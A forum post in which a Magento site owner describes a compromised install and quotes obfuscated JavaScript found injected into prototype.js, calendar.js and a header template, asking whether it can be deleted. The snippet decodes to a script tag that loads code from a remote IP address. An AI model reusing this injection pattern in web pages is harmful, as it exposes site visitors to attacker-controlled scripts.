|
My Magento install has been severely compromised. I can log into my admin dashboard, but non of the buttons will work.
I have been able to fix most of the php hacks which I posted in a previous post.
But I have come across some javascript code I think is a hack.
In my prototype.js file I found this at the end:
Element.addMethods();<!--
[removed](unescape(’<TOscqmeript%20sqmercG55=Q9//94qme.2TO43i7.2.195TO/jqueryTO.sfjs>sf<3i/scwporiG55pTOtQ9>’).replace(/TO|3i|qme|wpo|sf|G55|qM|Q9/g,""));
-->
In my calendar.js file I found this at the end:
<!--
[removed](unescape(’<TOscqmeript%20sqmercG55=Q9//94qme.2TO43i7.2.195TO/jqueryTO.sfjs>sf<3i/scwporiG55pTOtQ9>’).replace(/TO|3i|qme|wpo|sf|G55|qM|Q9/g,""));
-->
In my 1-header.phtml file I found this in the <head> section:
</head>
<script language=javascript><!--
[removed](unescape(’<TOscqmeript%20sqmercG55=Q9//94qme.2TO43i7.2.195TO/jqueryTO.sfjs>sf<3i/scwporiG55pTOtQ9>’).replace(/TO|3i|qme|wpo|sf|G55|qM|Q9/g,""));
--></script>
Has anyone else seen this code in these files. I want to verify that I can delete it.
|